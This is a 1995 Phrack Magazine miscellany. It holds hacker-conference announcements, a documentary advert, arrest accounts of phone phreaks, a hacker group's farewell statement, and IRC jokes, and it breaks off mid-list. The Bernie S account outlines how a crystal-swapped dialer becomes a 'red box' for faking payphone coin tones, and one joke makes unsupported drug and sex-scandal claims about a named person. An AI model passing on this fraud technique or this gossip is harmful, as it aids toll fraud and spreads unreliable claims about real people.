home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / phrack2 / phrack47.tx3 < prev    next >
Encoding:
Text File  |  2003-06-11  |  57.3 KB  |  1,746 lines

  1.                          ==Phrack Magazine==
  2.  
  3.               Volume Six, Issue Forty-Seven, File 3 of 22
  4.  
  5.  
  6.                            //   //  /\   //   ====
  7.                           //   //  //\\ //   ====
  8.                          ==== //  //  \\/   ====
  9.  
  10.                      /\   //  // \\    //  /===   ====
  11.                     //\\ //  //   //  //   \=\   ====
  12.                    //  \\/    \\ //  //   ===/  ====
  13.  
  14.                                  PART I
  15.  
  16. ------------------------------------------------------------------------------
  17.  
  18. -----BEGIN PGP SIGNED MESSAGE-----
  19.  
  20.  
  21.  
  22.  
  23.   Phrack Magazine and Computer Security Technologies proudly present:
  24.  
  25.                      The 1995 Summer Security Conference
  26.  
  27.  SSSS  U    U  M     M  M     M   EEEEE   RRRR     CCCC   OOOO    N   N
  28. S      U    U  MM   MM  MM   MM   E       R   R   C      O    O   NN  N
  29.  SSS   U    U  M M M M  M M M M   EEE     RRRR    C      O    O   N N N
  30.     S  U    U  M  M  M  M  M  M   E       R  R    C      O    O   N  NN
  31. SSSS    UUUU   M     M  M     M   EEEEE   R   R    CCCC   OOOO    N   N
  32.  
  33.                                "SUMMERCON"
  34.  
  35.       June 2-4 1995 @ the Downtown Clarion Hotel in Atlanta, Georgia
  36.  
  37. This is the official announcement and open invitation to the 1995
  38. incarnation of Summercon.  In the past, Summercon was an invite-only
  39. hacker gathering held annually in St. Louis, Missouri.  Starting
  40. with this incarnation, Summercon is open to any and all interested
  41. parties:  Hackers, Phreaks, Pirates, Virus Writers, System Administrators,
  42. Law Enforcement Officials, Neo-Hippies, Secret Agents, Teachers,
  43. Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers,
  44. Programmers, Conspiracy Nuts, Musicians and Nudists.
  45.  
  46. LOCATION:
  47.  
  48. The Clarion Hotel is located in downtown Atlanta, 9 miles from
  49. Hartsfield International Airport and just a few blocks from the
  50. Peachtree Center MARTA Station.
  51.  
  52.  
  53. Considering the exorbitant expenses involved with attending other
  54. conferences of this type, Rooms at Summercon are reduced to
  55.  
  56.                 $65 per night for Single or Double Occupancy
  57.  
  58.       The Clarion Hotel Downtown, Courtland at 70 Houston St., NE,
  59.                            Atlanta, GA 30303
  60.        (404) 659-2660 or (800) 241-3828   (404) 524-5390 (fax)
  61.  
  62.  
  63. No one likes to pay a hundred dollars a night.  We don't expect you
  64. to have to.  Spend your money on room service, drinks in the hotel bar,
  65. or on k-rad hacker t-shirts.  Remember:  Mention that you are attending
  66. Summercon in order to receive the discount.
  67.  
  68. DIRECTIONS
  69.  
  70. 75/85 Southbound - Exit 97 (Courtland).  Go 3 blocks south on Courtland
  71.           then turn left on Houston (John Wesley Dobbs Ave.)
  72. 20 East - Exit 75/85 North at International.  Turn Left on Courtland at
  73.           Houston Ave. NE. (aka. John Wesley Dobbs Ave. NE.)
  74. 20 West - Exit 75/85 North at International.  One block to Courtland
  75.           and right at Houston Ave. NE. (John Wesley Dobbs Ave. NE.)
  76.  
  77. Atlanta Airport Shuttle - The Express Bus that leaves from Atlanta's
  78. International Airport will drop you off at many hotels in the downtown
  79. area, including the Clarion.  The shuttle should be no more than 12
  80. dollars.  Fares may be paid at the Airport Shuttle in the Ground
  81. Transportation area of the Airport Terminal.
  82.  
  83. MARTA - The Metropolitan Atlanta Rapid Transit Authority (MARTA), is a
  84. convenient and inexpensive way to negotiate most of the Atlanta area.
  85. Take the MARTA train from the Airport to the Peach Tree Center Station.
  86. Walk three blocks down Houston to the intersection of Houston and
  87. Courtland.  The MARTA fare will be roughly 2 dollars.
  88.  
  89. Taxis - The average cab fare from Atlanta's Airport to the downtown area
  90. is roughly 30 dollars.
  91.  
  92. CONFERENCE INFO
  93.  
  94. It has always been our contention that cons are for socializing.
  95. "Seekret Hacker InPh0" is never really discussed except in private
  96. circles, so the only way anyone is going to get any is to meet new people
  97. and take the initiative to start interesting conversations.
  98.  
  99. Because of this, the formal speaking portion of Summercon will be
  100. held on one day, not two or three, leaving plenty of time for people
  101. to explore the city, compare hacking techniques, or go trashing and
  102. clubbing with their heretofore unseen online companions.
  103.  
  104. The "Conference" will be held on June 3rd from roughly 11:00 am until
  105. 6:00 pm with a 1 hour lunch break from 1:00 to 2:00.
  106.  
  107. NO VIDEO TAPING WILL BE ALLOWED IN THE CONFERENCE ROOM.  Audio Taping
  108. and still photography will be permitted.
  109.  
  110.  
  111. CURRENT LIST OF SPEAKERS:
  112.  
  113. Robert Steele   - Ex-Intelligence Agent, Founder and CEO of Open Source
  114.                   Solutions (a private sector intelligence firm)
  115.  
  116.            Topic: Hackers from the Intelligence Perspective
  117.  
  118. Winn Schwartau  - Author of "Information Warfare" and "Terminal Compromise",
  119.                   Publisher of Security Insider Report, and noted security
  120.                   expert
  121.  
  122.            Topic: Electromagnetic Weaponry
  123.  
  124. Bob Stratton    - Information Security Expert from one of America's largest
  125.                   Internet service providers
  126.  
  127.            Topic: The Future of TCP/IP Security
  128.  
  129. Eric Hughes     - Cryptography Expert and founding member of the "Cypherpunks"
  130.  
  131.            Topic: Cryptography, Banking, and Commerce
  132.  
  133. Annaliza Savage - London-based Director/Producer
  134.  
  135.            Topic: Discussion of her documentary "Unauthorized Access"
  136.                   (Followed by a public screening of the film)
  137.  
  138. Chris Goggans   - Editor of Phrack Magazine and Summercon M.C.
  139.  
  140.            Topic: introductions, incidentals and a topic which is sure
  141.                   to culminate in an international incident.
  142.  
  143.  
  144. (Other Speakers May Be Added - Interested parties may contact scon@fc.net)
  145.  
  146. COSTS
  147.  
  148. Since other cons of this type have been charging from 25 to 40 dollars
  149. entry fees, we are only charging 10 dollars.  Yes, that's correct,
  150. TEN (10) dollars in US currency.  Money is far too scarce among the
  151. hacker community to fleece everyone for money they will probably need
  152. to eat with or pay for their hotel rooms.
  153.  
  154.  
  155. WHAT TO DO IN ATLANTA:
  156.  
  157. To attempt to make everyone's stay in Atlanta more exciting, we are
  158. contacting local establishments to arrange for special discounts and/or
  159. price reductions for Summercon attendees.  Information will be handed
  160. out regarding these arrangements at the conference.
  161.  
  162. Atlanta is a happening town.
  163.  
  164. Touristy Stuff                            Party Time
  165.  
  166.   The World of Coca-Cola                    Buckhead
  167.   Underground Atlanta                       The Gold Club
  168.   Georgia Dome (Baseball?)                  (Countless Other Clubs and Bars)
  169.   Six Flags
  170.  
  171. CONTACTING SUMMERCON SPONSORS
  172.  
  173. You can contact the Summercon sponsors by several means:
  174.  
  175.     E-mail:     scon@fc.net
  176.  
  177.        WWW:     http://www.fc.net/scon.html
  178.  
  179. Snail Mail:     Phrack Magazine
  180.   603 W. 13th #1A-278
  181.   Austin, TX 78701
  182.  
  183.  
  184. If deemed severely urgent, you can PGP your email with the following PGP
  185. key:
  186.  
  187. - -----BEGIN PGP PUBLIC KEY BLOCK-----
  188. Version: 2.6
  189.  
  190. mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP
  191. Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk
  192. Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR
  193. tBRwaHJhY2tAd2VsbC5zZi5jYS51cw==
  194. =evjv
  195. - -----END PGP PUBLIC KEY BLOCK-----
  196.  
  197.  
  198. See you in Atlanta!
  199.  
  200.  
  201.  
  202.  
  203. -----BEGIN PGP SIGNATURE-----
  204. Version: 2.6
  205.  
  206. iQCVAwUBL4mMEaR4oxgb1CldAQE5dQP+ItUraBw4D/3p6UxjY/V8CO807qXXH6U4
  207. 46ITHnRJXWfEDRAp1jwl+lyavoo+d5AJPSVeeFt10yzVDEOb258oEZkIkciBnr7q
  208. mUu563/Qq67gBsOWYP7sLdu3KEgedcggkzxtUzPxoVRVZYkHWKKjkG1t7LiT3gQ5
  209. uRix2FrftCY=
  210. =m/Yt
  211. -----END PGP SIGNATURE-----
  212.  
  213. ------------------------------------------------------------------------------
  214.  
  215. UNAUTHORIZED ACCESS
  216.  
  217. "Unauthorized Access [is] a documentary that tells the story of the
  218. computer underground from our side, it captures the hacker world
  219. from Hamburg to Los Angeles and virtually everywhere in between."
  220.                                         2600  The Hacker Quarterly
  221.  
  222. Computers are becoming an integral part of our everyday existence.
  223. They are used to store and send a multitude of information, from
  224. credit reports and bank withdrawals, to personal letters and highly
  225. sensitive military documents.  So how secure are our computer
  226. systems?
  227.  
  228. The computer hacker is an expert at infiltrating secured systems,
  229. such as those at AT&T, TRW, NASA or the DMV.  Most computer systems
  230. that have a telephone connection have been under siege at one time
  231. or another, many without their owner's knowledge.  The really good
  232. hackers can reroute the telephone systems, obtain highly sensitive
  233. corporate and government documents, download individual's credit
  234. reports, make free phone calls globally, read private electronic
  235. mail and corporate bulletins and get away without ever leaving a
  236. trace.
  237.  
  238. So who are these hackers?  Just exactly WHAT do they do and WHY do
  239. they do it?  Are they really a threat?  What do they DO with the
  240. information that they obtain?  What are the consequences of their
  241. actions? Are hackers simply playing an intellectual game of chess
  242. or are hackers using technology to fight back and take control of
  243. a bureaucratic system that has previously appeared indestructible?
  244.  
  245. Unauthorized Access is a documentary that demistifies the hype and
  246. propaganda surrounding the computer hacker.  Shot in 15 cities
  247. and 4 countries, the film hopes to expose the truths of this subculture
  248. focusing on the hackers themselves.
  249.  
  250. Unauthorized Access is a view from inside the global underground.
  251.  
  252. For a PAL (European) copy send a cheque/postal order for 15 British
  253. Pounds or $25 for NTSC (American) standard to:
  254.  
  255. Savage Productions
  256. Suite One
  257. 281 City Road
  258. London  EC1V 1LA
  259.  
  260. ------------------------------------------------------------------------------
  261.  
  262.                             ACCESS ALL AREAS
  263.                            Hacking Conference
  264.  
  265.                           1st - 2nd July, 1995
  266.                           (Saturday  & Sunday)
  267.                        King's College, London, UK
  268.  
  269.  
  270. -------------------------------WHAT-IT-IS---------------------------------
  271.  
  272. The first UK hacking conference, Access All Areas, is to be run in London
  273. later this year.  It is aimed at hackers, phone phreaks, computer security
  274. professionals, cyberpunks, law enforcement officials, net surfers,
  275. programmers, and the computer underground.
  276.  
  277. It will be a chance for all sides of the computer world to get together,
  278. discuss major issues, learn new tricks, educate others and meet "The
  279. Enemy".
  280.  
  281.  
  282.  
  283. -------------------------------WHERE-IT-IS--------------------------------
  284.  
  285. Access All Areas is to be held during the first weekend of July, 1995 at
  286. King's College, London.  King's College is located in central London on
  287. The Strand and is one of the premier universities in England.
  288.  
  289.  
  290.  
  291. -----------------------------WHAT-WILL-HAPPEN-----------------------------
  292.  
  293. There will be a large lecture theatre that will be used for talks by
  294. computer security professionals, legal experts and hackers alike.  The
  295. topics under discussion will include hacking, phreaking, big brother and
  296. the secret services, biometrics, cellular telephones, pagers, magstrips,
  297. smart card technology, social engineering, Unix security risks, viruses,
  298. legal aspects and much, much more.
  299.  
  300. Technical workshops will be running throughout the conference on several
  301. topics listed above.
  302.  
  303. A video room, equipped with multiple large screen televisions, will be
  304. showing various films, documentaries and other hacker related footage.
  305.  
  306. The conference facilities will also include a 10Mbps Internet link
  307. connected to a local area network with various computers hanging off of it
  308. and with extra ports to connect your laptop to.
  309.  
  310.  
  311.  
  312. ------------------------------REGISTRATION--------------------------------
  313.  
  314. Registration will take place on the morning of Saturday 1st July from
  315. 9:00am until 12:00 noon, when the conference will commence.  Lectures and
  316. workshops will run until late Saturday night and will continue on Sunday
  317. 2nd July from 9:00am until 6:00pm.
  318.  
  319.  
  320.  
  321. ----------------------------------COST------------------------------------
  322.  
  323. The price of admission will be 25.00 British pounds (approximately US $40.00)
  324. at the door and will include a door pass and conference programme.
  325.  
  326.  
  327.  
  328. -----------------------------ACCOMMODATION--------------------------------
  329.  
  330. Accommodation in university halls of residence is being offered for the
  331. duration of the conference.  All prices quoted are per person, per night
  332. and include full English breakfast. (In British pounds)
  333.  
  334.  
  335.                              SINGLE       TWIN
  336.         WELLINGTON HALL       22.00       16.75
  337.  
  338.  
  339. Special prices for British and Overseas university students, holding
  340. current student identification, are also available - please call King's
  341. Campus Vacation Bureau for details.
  342.  
  343. All bookings must be made directly with the university.  They accept
  344. payment by cash, cheque and credit card.
  345.  
  346. To making a booking call the following numbers...
  347.  
  348.  
  349.         KING'S CAMPUS VACATION BUREAU
  350.  
  351.         Telephone : +44 (0)171 351 6011
  352.         Fax       : +44 (0)171 352 7376
  353.  
  354.  
  355.  
  356. ----------------------------MORE-INFORMATION------------------------------
  357.  
  358. If you would like more information about Access All Areas, including
  359. pre-registration details then please contact one of the following...
  360.  
  361.  
  362.         Telephone : +44 (0)973 500202
  363.         Fax       : +44 (0)181 224 0547
  364.         Email     : info@phate.demon.co.uk
  365.  
  366.  
  367.  
  368. ------------------------------------------------------------------------------
  369.  
  370.                 D I S T R I B U T E  W I D E L Y
  371.  
  372.                  *****FIRST CALL FOR PAPERS*****
  373.  
  374.                         InfoWarCon '95
  375.  
  376.                A 2 Day International Symposium
  377.                      on Information Warfare
  378.  
  379.                       September 7-8, 1995
  380.                    Stouffer Concourse Hotel
  381.                         Arlington, VA
  382.  
  383.                         Presented by:
  384.              National Computer Security Association
  385.                Winn Schwartau and Interpact, Inc.
  386.                    Robert Steele and OSS, Inc.
  387.  
  388.  
  389. CONFERENCE OVERVIEW:
  390.  
  391. The  Information  Warfare Conference (InfoWarCon)  is  our third
  392. international  conference  dedicated to the  exchange  of  ideas,
  393. policies,  tactics, weapons, methodologies and defensive  posture
  394. of Information Warfare on a local, national, and global basis.
  395.  
  396. InfoWarCon will bring together international experts from a broad
  397. range  of disciplines to discuss and integrate concepts  in  this
  398. rapidly  evolving field.  Attendees will intensely interact  with
  399. the  speakers  and presenters as well as each other  to  increase
  400. each other's understanding of the interrelatedness of the topics.
  401.  
  402. While  there are many interpretations of Information  Warfare  by
  403. different groups, the current working definition we employ is:
  404.  
  405.      Information  Warfare is the use of information and  informa
  406.      tion systems as weapons in a conflict where information  and
  407.      information systems are the targets.
  408.  
  409. Information  Warfare  is broken down into three  categories,  and
  410. InfoWarCon speakers and attendees will interactively examine them
  411. all:
  412.  
  413.      Class  I:  Personal Privacy.  "In Cyberspace You Are  Guilty
  414.      Until Proven Innocent."  The mass psychology of information.
  415.      Privacy versus stability and law enforcement.
  416.  
  417.      Class  II: Industrial and Economic Espionage.  Domestic  and
  418.      international  ramifications  and  postures  in  a  globally
  419.      networked, competitive society.
  420.  
  421.      Class III: Global Information Warfare.  Nation-state  versus
  422.      Nation-state  as an alternative to convention  warfare,  the
  423.      military perspective and terrorism.
  424.  
  425. THE CONFERENCE
  426.  
  427. The  conference  is designed to be interactive -  with  extensive
  428. interaction  between all participants. The  preliminary  contents
  429. and discussions will focus on:
  430.  
  431.  - What is Information Warfare?
  432.  - What Are the Targets?
  433.  - Protecting the Global Financial Infrastructure
  434.  - Military Perspectives on InfoWar
  435.  - InfoWar Vs. Non-Lethal Warfare
  436.  - Defending the U.S. Infrastructure
  437.  - The Intelligence Community and Information
  438.  - Open Source Intelligence
  439.  - The Psychology of Information
  440.  - Privacy Balances
  441.  - Information As the Competitive Edge
  442.  - International Cooperation
  443.  - Denial of Service
  444.  - Cyber-Terrorism
  445.  - Offensive Terrorism
  446.  - Offensive InfoWar Techniques
  447.  - Defensive InfoWar Postures
  448.  - Education and Awareness Training
  449.  - Corporate Policy
  450.  - Government Policy
  451.  - Global Policy
  452.  - Espionage
  453.  - Export Controls of Information Flow
  454.  - The Legal Perspective
  455.  - The New Information Warriors
  456.  
  457. Plenary sessions will accommodate all attendees, while  break-out
  458. sessions will provide more intimate presentations and interactiv
  459. ity on topics of specific interests.
  460.  
  461. SUBMISSIONS:
  462.  
  463. Submission  for papers are now be accepted.  We are  looking  for
  464. excellent speakers and presenters with new and novel concepts  of
  465. Information Warfare.  You may submit papers on the topics  listed
  466. above,  or on others of interest to you, your company or  govern
  467. ment.
  468.  
  469. We  welcome innovative thought from the private sector, the  gov
  470. ernment  (civilian, military and intelligence) and  the  interna
  471. tional  community.  Submissions must be received by May 1,  1995,
  472. and  notification  of  acceptance will occur  by  June  1,  1995.
  473. Please    submit    2-3   page    presentation    outlines    to:
  474.  
  475.                         winn@infowar.com.
  476.  
  477. All  submissions  and the contents of InfoWarCon '95 will  be  in
  478. English.   If you must submit a hard copy: Fax:  813.393.6361  or
  479. snail  mail  to:  Interpact, Inc. 11511 Pine  St.,  Seminole,  FL
  480. 34642
  481.  
  482. All submissions and presentation should be unclassified, as  they
  483. will become Open Source upon submission and/or acceptance.
  484.  
  485. SPONSORS:
  486.  
  487. The Information Warfare Symposium is currently choosing  sponsors
  488. for various functions.
  489.  
  490.  Continental Breakfast, Day 1 and Day 2
  491.  Morning Coffee Break, Day 1 and Day 2
  492.  Lunch, Day 1 and Day 2
  493.  Afternoon Coffee Break, Day 1 and Day 2
  494.  Cocktail Party, Day 1
  495.  
  496. Each Corporate or Organizational sponsor will be included in  all
  497. promotional  materials and  Symposium function.   For more infor-
  498. mation, contact Paul Gates at  the NCSA.  Voice: 717.258.1816  or
  499. email: 747774.1326@Compuserve.com.
  500.  
  501. EXHIBITS:
  502.  
  503. Limited space is available for table-top displays for  commercial
  504. or  governmental products, services, educational or other  promo
  505. tion. For further information, contact Paul Gates at the National
  506. Computer Security  Association. 717.258.1816
  507.  
  508. REGISTRATION:
  509.  
  510.      Payment made BEFORE July 1, 1995:
  511.  
  512.                 (   )  $445.00     NCSA Member/OSS Attendee
  513.   (   )  $545.00     All others
  514.  
  515.      Payment made AFTER July 1, 1995:
  516.  
  517.   (   )  $495.00     NCSA Members/OSS Attendees
  518.   (   )  $595.00     All others
  519.  
  520. (  )  I'M INTERESTED, but would like more information sent to the
  521.       address above.  Please include a free copy of your 32 page
  522.       "Information Security Resource Catalog".
  523.  
  524. (  )  I'd like to know more about NCSA on-site training, security
  525.       audits and  consulting services.  Please have someone give me
  526.       a call.
  527.  
  528. MAIL OR FAX TO:
  529.  
  530.                  National Computer Security Association
  531.                  10 South Courthouse Avenue
  532.                  Carlisle, PA 17013
  533.                  Phone 717-258-1816 or FAX 717-243-8642
  534.                  EMAIL:       74774.1326@compuserve.com
  535.                  CompuServe:  GO NCSAFORUM
  536.  
  537.   Winn Schwartau Interpact, Inc.
  538.   Information Security & Warfare
  539.   V:813.393.6600 F:813.393.6361
  540.             Email: Winn@Infowar.Com
  541.  
  542. ------------------------------------------------------------------------------
  543.  
  544.     Ed Cummings, also known to many in cyberspace as "Bernie S" was arrested
  545. on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale
  546. of a device to commit Telecommunications fraud charges. He is being held in
  547. Delaware County Prison in lieu of $100,000.00 Bail. His story follows.
  548.  
  549.     On the evening of the 13th Bernie S. received a page from his mail drop.
  550. Some people he knew from Florida had stopped in at his mail drop thinking
  551. it was his address.  They were looking to purchase several 6.5 Mhz Crystals.
  552. These crystals when used to replace the standard crystal in the RADIO SHACK
  553. Hand Telephone dialer, and with some programming, produce tones that trick
  554. pay phones into believing they have received coins.  These are commonly
  555. referred to as "red boxes" and got their name from an actual red box pulled
  556. from a pay phone in the late seventies by some curious person.
  557.  
  558.     Ed Cummings met these people at a local 7-11 (which 7-11?) where he was
  559. to sell the widely used electronic timing crystals for roughly $4 a piece.
  560. The purchaser only had two twenty dollar bills and Ed Cummings no change.
  561. Ed Cummings went into the 7-11 to get some change to make the transaction.
  562. A police officer noticed a van parked in the parking lot of the 7-11 with
  563. more several African Americans inside.  As Ed was leaving the 7-11 he noticed
  564. fifteen police cars pulling into the parking lot of the 7-11.
  565.  
  566.     Next thing he knew the police were asking him if they could `rifle`
  567. through his car.  He said no.  Moments later as he was talking to a Detective
  568. and noticed another police officer going through his car.  He asked the officer
  569. to stop.  They did not, in all the police confiscated a few hundred 6.5Mhz
  570. crystals (which he resells for roughly $4 a piece) and a large box of 100
  571. dialers.  The police told him they would get back to him,  and he could have
  572. his electronics back if the contents of the bag were legal.  In the contents
  573. of the seized items was one modified dialer, that a customer returned after
  574. modification explaining that it did not work, a broken red box.
  575.  
  576.     The next day Ed `Bernie S.` Cummings was over at a friend`s house working
  577. on their computer when eight to ten plain clothed armed men burst into the
  578. house and ordered him and his friends to freeze.  They cuffed him and took him
  579. to a holding cell (what jail?).  There he was left without a blanket or jacket
  580. to sleep with in the cold cell.
  581.  
  582.     That evening the Secret Service had been called in when someone figured
  583. out what the dialers and crystals would do when put together.  The
  584. United States Secret Service found his home and entered it, while they were
  585. questioning him.
  586.  
  587.     The next morning at his arraignment he was finally told of the charges
  588. he was being held upon. They were Two misdemeanor Charges of manufacture,
  589. Distribution and Sale of devices of Telecommunications Fraud. and Two Unlawful
  590. use of a computer charges. His bail was automatically set to $100,000.00
  591. because Ed Cummings refused talk with the police without his attorney present.
  592.  
  593.     The Secret Service presented to the judge a 9 page inventory of what
  594. they had found in his home.   On that inventory there 14 computers. 2 printers.
  595. more Boxes of bios chips for the systems he worked with. Eprom burners which
  596. the Federal Agents had labeled "Cellular telephone chip reprogramming adapters"
  597. Eproms are used in everything from Automobile computers to personal computers.
  598. They also confiscated his toolbox of screw drivers, wire clippers and other
  599. computer oriented tools he used for his consulting job.
  600.  
  601.     The Judge dropped the Two unlawful use of a computer charges due to
  602. the fact that the evidence was circumstantial and the county had no actual
  603. evidence that Ed had ever used the computers in question.
  604.  
  605.     As of 3/27/1995 Ed Cummings is still in Delaware County Prison
  606. awaiting his trial.  His trial has not yet been scheduled and Ed will most
  607. likely not raise the One Hundred Thousand Dollars needed to be released on
  608. bail.
  609.  
  610. ------------------------------------------------------------------------------
  611.  
  612. "Don't believe the hype."  -  Public Enemy, 1988
  613.  
  614. This file's purpose is to clear up any misconceptions about the recent
  615. situation that has come upon the sociopolitical group known as KoV.
  616.  
  617. As it stands now, (10:55 PM EST on 1/29/95), NO ONE has been busted for
  618. ANYTHING. We have received several tip-offs from private sources regarding
  619. a supposed "FBI investigation" of our group that is purported to be active
  620. at this very minute. However, with the exception of a few VERY suspicious
  621. incidents and coincidences, there has been NO HARD EVIDENCE thus far about
  622. ANYONE getting busted for ANYTHING. So while we are EXTREMELY concerned for
  623. the integrity of our innocence, we must stress that nothing has gone down.
  624.  
  625. Yet.
  626.  
  627. We have very good reason to believe that a few of those among us are about
  628. to be charged with various false accusations by a local university. However
  629. the current mental state of the person in charge of this charade is also in
  630. question. Therefore it would be logical to assume nothing. The conflicting
  631. tip-offs, rumors, warnings and threats that we have received make it even
  632. more difficult to get a clear picture of exactly what is going on. We have
  633. heard so many things from so many different sources, both credible and
  634. questionable, that we would be hard-pressed to give an accurate evaluation
  635. of the current state of things.
  636.  
  637. What we can say for sure, however, is that KoV officially died on Monday,
  638. January 23, 1995, along with its communications network, KoVNet. This
  639. promises to be a great loss to the open-minded and sociopolitical community
  640. as well as the free-thinkers and activists who supported us so generously.
  641. Our reasons for disbanding the group were many, but the foremost was in
  642. light of the current situation we are facing.
  643.  
  644. Consider this last obstacle our final, stalwart stand against the evils of
  645. AmeriKKKan government and its various greedy, capitalistic agencies.
  646. From the moment of KoV's conception, they have publicly sought to destroy
  647. us; to silence our questioning of authority, to oppress our free-thinking
  648. minds, and to close off our intellectual channels of communication. They
  649. have even gone so far as to stalk us in public places. 'Tis a shame indeed.
  650.  
  651. If you have any questions or if you wish to contact us for any reason,
  652. you may email sgolem@pcnet.com with the subject or header of "ATTN: KoV".
  653. I will try to post further updates of this saga to CiPNet, ThrashNet,
  654. QuantumNet, InsanityNet, ScumNet, FizzNet, NukeNet and any others I can.
  655. We would appreciate any support that other h/p, art or political groups can
  656. lend us. Until then, my friends...
  657.  
  658. -Lord Valgamon, Malicious Intent, Onslaught, Leland Gaunt & the rest of KoV
  659.  
  660. ------------------------------------------------------------------------------
  661.  
  662.                 What happens when you are caught beige boxing.
  663.  
  664.                         by Rush 2
  665.  
  666.  
  667.         Yeah yeah, I'm the only one.  But here is a generally interesting
  668.      description of everything to getting caught to arraignment.
  669.  
  670.         Well about 5 months ago i needed to set up a conference really quick..
  671.      it was about 12:00  (never knew there was a 10:00 pm curfew in that area)
  672.      and went to a 25 pair box at this local strip mall.  Well I was out there
  673.      the box was already open and I was just about to start testing pairs to
  674.      see which was connected and what wasn't.
  675.  
  676.         All of a sudden, i hear this loud screeching sound of a car coming
  677.      to a skid from doing about 90mph.  I turned and saw that typically dirty
  678.      squad car about to hit me.. you know the car, mud and dust on the tires
  679.      and body, coffee and smudge marks all over the windshield.  i got on my
  680.      bike and started to run.  Now the thing is I COULD have gotten away.. the
  681.      pathetic excuse for a cop had run not more than 10 yards after me and
  682.      decided that I was a threat so he pulled his handgun and yelled.  I saw
  683.      this and thought it would be wiser to stop than get shot.
  684.  
  685.         Within 2 minutes at LEAST 10 squad cars had come to his aide.. i did
  686.      not know i was less than a half mile from a police station and they were
  687.      looking for a prowler in the general area.  The police did the normal,
  688.      called me scum, asked me what i was doing, searched me until they were
  689.      satisfied...  than picked me up and threw me in the car... the funny
  690.      thing was they didn't see my phone until they threw me into the back seat
  691.      and the cord fell out.. (they never saw the page of notes and 'naughty'
  692.      material in my pocket though it was about 4 inches thick and sticking out
  693.      that a blind man could see it.
  694.  
  695.         Well they got me to the station and pried my info out, and called my
  696.      father... I came up with a good enough story about some made up user
  697.      who told me to go across the street and plug in..  then I was told I
  698.      would be dealt with in the next week...  I did not receive anything for
  699.      three and a half months.
  700.  
  701.         Once the time came for the arraignment (for a juvenile they called it
  702.      an intake).  I got to go to the police station, sit for about 3 hours (as
  703.      if i thought they would be on time) until I waited for my probation
  704.      officer. Finally she got there and we proceeded to talk.  She explained
  705.      all of the charges and my lawyer (interesting guy) laughed, I was being
  706.      charged with prowling (could be disputed I was on a public sidewalk and
  707.      there in that strip mall is a 24 hr laundry mat), loitering (again that
  708.      could be disputed), and attempted theft of services (though I NEVER even
  709.      plugged in).
  710.  
  711.         After this was all said i spent the next hour talking with the lady
  712.      in private.  I immediately found she had an interest in computers and was
  713.      having a problem with her home pc.  So I easily changed the topic to my
  714.      fascination in computers and solved her problem with her computer, and
  715.      answered at least 50 questions about them.  In the last 10-15 minutes of
  716.      the conversation all i could get from her were statements about how
  717.      impressed and how intrigued she was with me.  She ended up giving me a
  718.      look (that was hard to judge but i am staying away from this chick) that
  719.      was either confusion or attraction, slipped me a card with her home phone
  720.      number and name and called back in my lawyer and parents.
  721.  
  722.         Once they got back in, all that she really said was I was a great boy,
  723.      that she would like to see me do more with my time besides computers, and
  724.      that she was taking my sentence of 12 months formal probation with 300
  725.      hours of community service to 3 months of informal probation with 30
  726.      hours of community service.  That and she said bell was asking her what
  727.      to do and she would tell them that it was a non issue since I did not
  728.      plug in and even if I had it would not be their concern unless I had
  729.      plugged in to the telco access part of the network interface.
  730.  
  731.         Well I have yet to receive official record of having to perform
  732.      the community service or the probation but I called my probation officer
  733.      yesterday and said she wasn't putting the community service into the
  734.      punishment and it has been an equivalent amount of time to just say that
  735.      since I haven't gotten in trouble since she will count the probation as
  736.      already served.  Luckily she based all other needs of me on the report
  737.      from a teacher, and with my luck she picked the one teacher, my computers
  738.      teacher, that no matter what I did or said would lie and say I didn't.
  739.  
  740.  
  741.         Thanks to erikb for publishing this, and greets to CXrank, paradox,
  742.      dark phiber, the fat cop (who spilled his coffee and box of donuts
  743.      coming after me) that made this all possible,  and to everyone else.
  744.  
  745.  
  746.                         -rush 2
  747.             http://www-bprc.mps.ohio-state.edu/cgi-bin/hpp/Rush_2.html
  748.  
  749.  
  750.                 Look for My site, unforeseen danger soon to be on a 28.8 slip
  751.             and by the end of the summer on a 500k slip connect.
  752.  
  753.  
  754. ------------------------------------------------------------------------------
  755.  
  756. [Something found on IRC]
  757.  
  758. Danny Partridge         Emmanuel Goldstein
  759. (AKA Danny Bonaduce:    (AKA Eric Corley:
  760. a child star from       the child-like publisher
  761. "The Partridge Family"  of 26oo magazine.
  762. ----------------------  ------------------
  763.  
  764. Hosts a boring local    Hosts a boring local
  765. radio program.          radio program.
  766.  
  767. Quasi Celebrity         Quasi Celebrity
  768. Status among            Status among
  769. 70's freaks             telephone phreaks
  770.  
  771. Periods of Heavy        Periods of Heavy
  772. Drug Usage              Drug Usage
  773.  
  774. Involved in Sex         Involved in Sex
  775. Scandal with            Scandal with
  776. another man             another man
  777.  
  778. Last name is            Friends with Phiber
  779. "Bonaduce"              Optik whose first
  780.                         handle was "Il Duce"
  781.  
  782. Supplements incoming    Supplements incoming
  783. by doing desperate      by doing desperate
  784. local talk shows        local talk shows
  785. whenever he can.        whenever he can.
  786.  
  787. ------------------------------------------------------------------------------
  788.  
  789. Top 10 #hack fights that would be the coolest to see.
  790. (And no, Ophie's not in it twice just because she's a girl...)
  791. ===========================================================================
  792.  
  793. 10.) The D.C. Convention Center is Proud to Present: Hot-Oil Wrestling
  794. featuring KL & TK.
  795.  
  796. 9.) Ludichrist vs. GFM, to be resolved at the next convention, or, uh, the
  797. one after that... or, uh...
  798.  
  799. 8.) C-Curve and Elite Entity, "Who's who?"
  800.  
  801. 7.) Ben Camp vs. Ben Sherman, "Particles of Novocain Everywhere."
  802. (Or: "I'm totally numb, let me hug you!!!")
  803.  
  804. 6.) Dan Farmer and Pete Shipley: "Whips vs. Chains"
  805.  
  806. 5.) Grayarea vs. Netcom "No, *I* want root..."
  807.  
  808. 4.) WWF Wrestling with Len and |al|.
  809.  
  810. 3.) Ophie vs. Voyager, "Night of the Living Dead."
  811.  
  812. 2.) Okinawa vs. Gail Thackery, "The Winner Gets Okinawa's Testicle."
  813. and the number one #hack fight is
  814.  
